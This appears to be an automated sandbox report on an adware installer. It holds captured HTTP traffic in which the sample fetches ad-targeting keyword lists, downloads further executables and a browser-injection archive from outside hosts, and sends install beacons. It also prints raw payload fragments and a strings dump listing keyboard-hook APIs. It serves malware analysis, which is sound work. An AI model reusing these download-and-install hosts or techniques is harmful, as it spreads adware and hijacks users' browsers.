.....u...3....3...F.....;5,cB.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /cgi-bin/advert/getkws.cgi?did=90068&version=0&key=azJJ.s8MVPsHc HTTP/1.1
User-Agent: gmsd_re_005010096-1.20
Host: ads.under-myscreen.be
Accept: */*
Accept-Encoding: gzip, deflate
Referer:
Cookie:
Accept-Language: en,en-US
X-Guuid: 75ed9567-aa58-4c8e-a8ea-3cad7c47ab03
X-OS-Ver: 5.1.2.2600
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:46:30 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
X-C4PC-ServerName: ads.under-myscreen.be
Set-Cookie: _c4aid=75ED9567AA584C8EA8EA3CAD7C47AB03; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=under-myscreen.be; path=/;
Set-Cookie: _c4aid2=75ED9567AA584C8EA8EA3CAD7C47AB03,1443221190.42548; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=under-myscreen.be; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
1f1..{"dids":{"90077":{"unmatch":["regiedepub.com|under-myscreen.be|eorezo.com|regiedepub.com"],"match":[{"u":0,"m":"yahoo|live|wikipedia|bing|msn|amazon|tumblr|royalbank|reddit|ebay"},{"u":0,"m":"pinterest|apple|ask|microsoft|bmo|wordpress|cibc|paypal|baidu|cbc"},{"u":0,"m":"xhamster"},{"u":0,"m":"xvideos|imbd|instagram|netflix|craigslist|kickass|td|thepiratebay"},{"u":0,"m":"http|fa|go|yah|hot|twit|blog|msn|apple|facebook|google|twitter|youtube"}]}},"freeze":3600,"refresh":3600,"version":116556}..0..
GET /finalinstaller/24.08.2015/FinalInstaller_dotnet4.exe HTTP/1.1
Connection: Keep-Alive
Host: d22nes4susdva1.cloudfront.net
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 3030016
Connection: keep-alive
Date: Mon, 24 Aug 2015 06:58:00 GMT
Last-Modified: Mon, 24 Aug 2015 06:48:08 GMT
ETag: "a3078153a7a53bfc0a7a0b8fd20d757a"
Accept-Ranges: bytes
Server: AmazonS3
Age: 69614
X-Cache: Hit from cloudfront
Via: 1.1 affe26bf02a36a4a45ea1eb3ce2b4a62.cloudfront.net (CloudFront)
X-Amz-Cf-Id: GQKorADvQepenzx1GtyWuoYr9XO72LsJBKzGeiEXKvES-AOk9YhZXA==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z..U.................|-...........-.. ........@.. ................................/...@.................................@.-.K.....-......................`........-.............................................. ............... ..H............text....{-.. ...|-................. ..`.rsrc.........-......~-.............@..@.reloc.......`.......:..............@..B................p.-.....H.......PD%.TV.......'......._ ..........................................(.'..*.r.(......}......}......}....*....(....o....*.0../.......(.'....o.............(\'.....r...p...(1'.....(B'.....( '.....r...p...(5'....(....()'..o....,.r...p*.o....(*'..(Z'..(X'..r...p(....()'..o....,.(*'..(Z'..(X'..r...p(....()'..*.o..............(]'.....(6'.....(5'.....(B'.....(]'.....(Z'.....(]'.....(?'.....(.'......(D'......r...p..(....()'..o....,.r...p*.*..0..4.......r!..pr...p.(......,..o....(....o.........&..~....*.*........)).......0..4.......r...pr...p.(......,..o....(....o.........&..~....*.*........))........*...$.](m...&*2..(....&..Z*....0..........rm..p..c.d(....&..(......*..2..(....&..Z*....0..........r...p..c.d(....&..(......*..2..(....&..Z*....0..........r...p..c.d(....&..(......*..2..(....&..Z*....0..........r...p..c.d(....&..(......*..2..(....&..Z*....0..........r...p..c.d(....&..(......*..2..(....&..Z*....0..........r...p..c.d(....&..(......*..2..(....&..Z*....0..........r...p..c.d(....&..(......*..2..(....
<<< skipped >>>
GET /crossbrowse/ie/107/ie.zip.001 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:45:25 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008912"
Last-Modified: Mon, 31 Aug 2015 08:15:12 GMT
Cache-Control: max-age=40693
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1443221126.dop006.fr7.t,1443221125.cds027.fr7.c
PK........l..G...nd.T.d.T.....chrome.packed.7z7z..'.....T...T.............*..F......8%D.cT(g.....,r...E^<5....S$<....Z..*...7&.o.,.a&......%...1..5...m...h..=w.|.a.a.Q.{.<..:..9Q,>n...k.....~..aJ.._...KD.V...7.>..3....d......)..6.H..RN...:.....FU.!..j...9....L.&.2.a........ .E.s'T.......vD.z)..}..-.. .&.vF}.$.z.......lw.>..!...'.a..|...L....09E..Y8^.s.O\..C..%.......d.VD....W..d.'..6%...l.7Gk.<..I...5...d !......wT...d...H..7v.E.......{.p.]`.......~w84.rj......;...).q.k..G...........zL...{....>.."........"q..k[.f...F{8...s..c>[69..|...q].(.S..~..1z..>.!AT&i.}....YJ....\i....o..(...4.5.......h|.......6.!...4.p[....@.m.. ^&...A..&E..V.]...T=.v]W.l=A=y.T....R.'f.....60..MR...k...c.1."..jw.7C.N...b....@...@....%..%*!5............iW*y..*......E...D....6....3.P....2.....} .'..!...cG.m...Z.]%{.QZ./e.V-C.a.X.aQ?.....S..1...:.T..C*..hKH....(...aH.r..;..^.l.ikR.X..8..._...^T{B@..'.tga.3."..<. ...........$c9......... .~)/..%.2{...X&.W.....>...bh.L.....U.-.Vf......r..d..9. ..k.'.M...J...v...rU..`3...SWX...G1.`....{.....8.~..x..Q...g.._...1.9.......f8..#p..............]...E.(....J....(H.h..6@'.hc.5....}.1>{..6/.R.....(X.k.<....\.....:p...u..L.....h...K...vaK./.O........'|...8..2...{..9....."&.......Z..K.eJ..4e..)v..[...J$.e........5.G......X..@.o.^Y...%....._.n.:...\......H...0,.f.E...*M.F.f.R.lJ*,...S.....FE*'b.#V.@........a=._.....W... .}.....p.~..(>.....E.1k....3k....F..[.T...,N...............Y7.......G[....rH).E......[.5..K..Q..J#8.-.@.]<eh........2a.c.8...Z....O.....z..2c
<<< skipped >>>
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_INI HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:46:24 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Fri, 25 Sep 15 22:46:00 GMT
Set-Cookie: _c4aid=7117B4EAD2AE47B1A52740D5241A664B; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=7117B4EAD2AE47B1A52740D5241A664B,1443221184.57749; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 142493);......0..
GET /utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=8864 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: UFBDNmnt6rS4w8afrX4BcyshylNY8tqx53lOZbWuSu6TRAf34ZAscPxtEuOa6INDvkzQJiDohVo=
x-amz-request-id: DB8ACFE45D99CE26
Date: Fri, 25 Sep 2015 22:45:26 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=6496 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: c9aH3qj3/n42qjpDqWF2zAldMWFGxU1Uy6ImiwbfmCt/kAOj9jGVV1hcVb6WsP5ZpdGQ32KsZ7k=
x-amz-request-id: F5966C8CC5540619
Date: Fri, 25 Sep 2015 22:45:27 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=715 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: tDspsDOXcDyfJ6Go7K F67M/69GeTNGtf8Tadk42VkUfZ8O7Y4pwmwG/ZtGM pyyTfhBTxZOgbY=
x-amz-request-id: B2B2021B6E709490
Date: Fri, 25 Sep 2015 22:45:27 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: tDspsDOXcDyfJ6Go7K F67M/69GeTNGtf8Tadk42VkUfZ8O7Y4pwmwG/ZtGM pyyTfhBTxZOgbY=..x-amz-request-id: B2B2021B6E709490..Date: Fri, 25 Sep 2015 22:45:27 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=1932 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: tNnPeAT XnTTXoeVwTSoB9leKhoKgD2G3CA/d4hEiu2ZHdTC0KOVYLoy t6gfip0P7WGGF6LkUs=
x-amz-request-id: 927F066C2DCEE3CF
Date: Fri, 25 Sep 2015 22:45:34 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: tNnPeAT XnTTXoeVwTSoB9leKhoKgD2G3CA/d4hEiu2ZHdTC0KOVYLoy t6gfip0P7WGGF6LkUs=..x-amz-request-id: 927F066C2DCEE3CF..Date: Fri, 25 Sep 2015 22:45:34 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=4546 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: k2QV8FgigupMMQS Q8QqTLKcKPYpWvV4FTUtDIQK4hd TU4MB27IcmAqpwLyL7VMJg0rkS0ljh4=
x-amz-request-id: 84878FB945610163
Date: Fri, 25 Sep 2015 22:45:37 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: k2QV8FgigupMMQS Q8QqTLKcKPYpWvV4FTUtDIQK4hd TU4MB27IcmAqpwLyL7VMJg0rkS0ljh4=..x-amz-request-id: 84878FB945610163..Date: Fri, 25 Sep 2015 22:45:37 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=2118 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: tSvohUTlKbM9 3yR Egr1rOJo7xhmup9qXo/CFXwi4A9YNipBK/Htj Vpv1KOcVCYues03wo6y4=
x-amz-request-id: 225073E7BCEEC1D3
Date: Fri, 25 Sep 2015 22:45:46 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: tSvohUTlKbM9 3yR Egr1rOJo7xhmup9qXo/CFXwi4A9YNipBK/Htj Vpv1KOcVCYues03wo6y4=..x-amz-request-id: 225073E7BCEEC1D3..Date: Fri, 25 Sep 2015 22:45:46 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=9936 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: pBrZ079IOmdCgJcOGAVpmdcHi/BGPQszqv9XrumvJ3WC6m1ynJ0A1p3oYca5NVj0Gcaw3fRfZyc=
x-amz-request-id: C4D1968177D3D15D
Date: Fri, 25 Sep 2015 22:45:47 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: pBrZ079IOmdCgJcOGAVpmdcHi/BGPQszqv9XrumvJ3WC6m1ynJ0A1p3oYca5NVj0Gcaw3fRfZyc=..x-amz-request-id: C4D1968177D3D15D..Date: Fri, 25 Sep 2015 22:45:47 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..
Map
The SpyTool connects to the servers at the folowing location(s):
Strings from Dumps
upgmsd_re_005010096.exe_1276:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
RSSSSSSh
RSSSSSSh
QSShh
QSShh
tFHt:Ht.Ht"Hu`
tFHt:Ht.Ht"Hu`
SSSShp
SSSShp
SSSSh
SSSSh
u$SShe
u$SShe
tWSShW
tWSShW
tl9_ tgSSh
tl9_ tgSSh
t'SShl
t'SShl
SSSShxjn
SSSShxjn
j%XtL9E
j%XtL9E
FtPW
FtPW
SSh@B
SSh@B
u.SSh
u.SSh
tsSSh
tsSSh
FTCP
FTCP
t.WWWSP
t.WWWSP
tAHt.HHt
tAHt.HHt
FTPS
FTPS
u)SShF
u)SShF
s%j.Zf
s%j.Zf
xSSSh
xSSSh
FTPjKS
FTPjKS
FtPj;S
FtPj;S
C.PjRV
C.PjRV
operand of unlimited repeat could match the empty string
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
POSIX named classes are supported only within a class
erroffset passed as NULL
erroffset passed as NULL
POSIX collating elements are not supported
POSIX collating elements are not supported
this version of PCRE is not compiled with PCRE_UTF8 support
this version of PCRE is not compiled with PCRE_UTF8 support
PCRE does not support \L, \l, \N, \U, or \u
PCRE does not support \L, \l, \N, \U, or \u
support for \P, \p, and \X has not been compiled
support for \P, \p, and \X has not been compiled
(*VERB) with an argument is not supported
(*VERB) with an argument is not supported
!"#$%&'((()* ,-./01
!"#$%&'((()* ,-./01
CNotSupportedException
CNotSupportedException
CCmdTarget
CCmdTarget
RegOpenKeyTransactedW
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyTransactedW
CFtpFileFind
CFtpFileFind
CHttpConnection
CHttpConnection
CFtpConnection
CFtpConnection
CHttpFile
CHttpFile
RegDeleteKeyExW
RegDeleteKeyExW
TaskDialogIndirect
TaskDialogIndirect
CMDITabProxyWnd
CMDITabProxyWnd
CMDIChildWndEx
CMDIChildWndEx
CMDIFrameWndEx
CMDIFrameWndEx
CMDIChildWnd
CMDIChildWnd
CMDIFrameWnd
CMDIFrameWnd
CMDIClientAreaWnd
CMDIClientAreaWnd
CHotKeyCtrl
CHotKeyCtrl
CMFCToolBarsKeyboardPropertyPage
CMFCToolBarsKeyboardPropertyPage
GetProcessWindowStation
GetProcessWindowStation
operator
operator
portuguese-brazilian
portuguese-brazilian
qR.Rd
qR.Rd
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
%%X
%%X
RegSetKeySecurity error! (rc=%lu)
RegSetKeySecurity error! (rc=%lu)
Key not found.
Key not found.
Error opening key.
Error opening key.
ntdll.dll
ntdll.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
LookupPrivilegeValue error: %u
LookupPrivilegeValue error: %u
Error %d: Could not begin update of %s
Error %d: Could not begin update of %s
Error %d: Updating resource
Error %d: Updating resource
!"#$%&'()* ,-./:;?@[\]^_`{|}~
!"#$%&'()* ,-./:;?@[\]^_`{|}~
C:\appbuilder_2.0_multiinstall\Release\temp.pdb
C:\appbuilder_2.0_multiinstall\Release\temp.pdb
IPHLPAPI.DLL
IPHLPAPI.DLL
PSAPI.DLL
PSAPI.DLL
GetProcessHeap
GetProcessHeap
GetWindowsDirectoryW
GetWindowsDirectoryW
GetCPInfo
GetCPInfo
KERNEL32.dll
KERNEL32.dll
GetKeyState
GetKeyState
SetWindowsHookExW
SetWindowsHookExW
CreateDialogIndirectParamW
CreateDialogIndirectParamW
UnhookWindowsHookEx
UnhookWindowsHookEx
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjectsEx
GetAsyncKeyState
GetAsyncKeyState
MapVirtualKeyW
MapVirtualKeyW
GetKeyboardLayout
GetKeyboardLayout
GetKeyboardState
GetKeyboardState
GetKeyNameTextW
GetKeyNameTextW
MapVirtualKeyExW
MapVirtualKeyExW
EnumChildWindows
EnumChildWindows
USER32.dll
USER32.dll
GetViewportExtEx
GetViewportExtEx
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
MSIMG32.dll
MSIMG32.dll
COMDLG32.dll
COMDLG32.dll
WINSPOOL.DRV
WINSPOOL.DRV
RegLoadKeyW
RegLoadKeyW
RegUnLoadKeyW
RegUnLoadKeyW
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegSetKeySecurity
RegSetKeySecurity
RegDeleteKeyW
RegDeleteKeyW
RegEnumKeyExW
RegEnumKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyW
RegEnumKeyW
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteW
ShellExecuteExW
ShellExecuteExW
SHELL32.dll
SHELL32.dll
COMCTL32.dll
COMCTL32.dll
UrlUnescapeW
UrlUnescapeW
SHLWAPI.dll
SHLWAPI.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
oledlg.dll
oledlg.dll
OLEACC.dll
OLEACC.dll
InternetCrackUrlW
InternetCrackUrlW
HttpOpenRequestW
HttpOpenRequestW
HttpSendRequestW
HttpSendRequestW
HttpQueryInfoW
HttpQueryInfoW
InternetCanonicalizeUrlW
InternetCanonicalizeUrlW
FtpDeleteFileW
FtpDeleteFileW
FtpRenameFileW
FtpRenameFileW
FtpCreateDirectoryW
FtpCreateDirectoryW
FtpRemoveDirectoryW
FtpRemoveDirectoryW
FtpSetCurrentDirectoryW
FtpSetCurrentDirectoryW
FtpGetCurrentDirectoryW
FtpGetCurrentDirectoryW
FtpPutFileW
FtpPutFileW
FtpGetFileW
FtpGetFileW
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpEndRequestW
HttpEndRequestW
HttpSendRequestExW
HttpSendRequestExW
FtpOpenFileW
FtpOpenFileW
FtpCommandW
FtpCommandW
FtpFindFirstFileW
FtpFindFirstFileW
InternetOpenUrlW
InternetOpenUrlW
WININET.dll
WININET.dll
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
IMM32.dll
IMM32.dll
WINMM.dll
WINMM.dll
.PAVCOleException@@
.PAVCOleException@@
.PAVCException@@
.PAVCException@@
.PAVCObject@@
.PAVCObject@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCArchiveException@@
.PAVCArchiveException@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCUserException@@
.PAVCUserException@@
.PAVCResourceException@@
.PAVCResourceException@@
.?AVCFtpFileFind@@
.?AVCFtpFileFind@@
.?AVCFtpConnection@@
.?AVCFtpConnection@@
.?AVCHttpConnection@@
.?AVCHttpConnection@@
.?AVCHttpFile@@
.?AVCHttpFile@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0EA@@ATL@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0EA@@ATL@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WV12@PB_W@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WV12@PB_W@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W_N_N@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W_N_N@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AVCToolCmdUI@@
.?AVCToolCmdUI@@
.?AVCMDITabProxyWnd@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIChildWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMDIFrameWnd@@
.?AVCMFCToolBarCmdUI@@
.?AVCMFCToolBarCmdUI@@
.?AVCKeyboardManager@@
.?AVCKeyboardManager@@
.PAVCOleDispatchException@@
.PAVCOleDispatchException@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCRibbonCmdUI@@
.?AV?$CArray@PAVCMFCRibbonKeyTip@@PAV1@@@
.?AV?$CArray@PAVCMFCRibbonKeyTip@@PAV1@@@
.?AVCMFCWindowsManagerDialog@@
.?AVCMFCWindowsManagerDialog@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAUHMENU__@@PAU3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAUHMENU__@@PAU3@@@
.?AVCMFCCmdUsageCount@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCObList@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCObList@@PAV3@@@
.?AVCMFCColorBarCmdUI@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AV?$CMap@KKV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AVCMFCStatusBarCmdUI@@
.?AVCMFCStatusBarCmdUI@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCAcceleratorKey@@
.?AVCHotKeyCtrl@@
.?AVCHotKeyCtrl@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCRibbonKeyTip@@
.?AVCOleCmdUI@@
.?AVCOleCmdUI@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WHH@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WHH@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCRibbonKeyboardCustomizeDialog@@
.?AVCMFCRibbonKeyboardCustomizeDialog@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÃ
zcÃ
.?AV?$CArray@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@ABV12@@@
.?AV?$CArray@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@ABV12@@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.PAVCFileException@@
.PAVCFileException@@
.PAVCInternetException@@
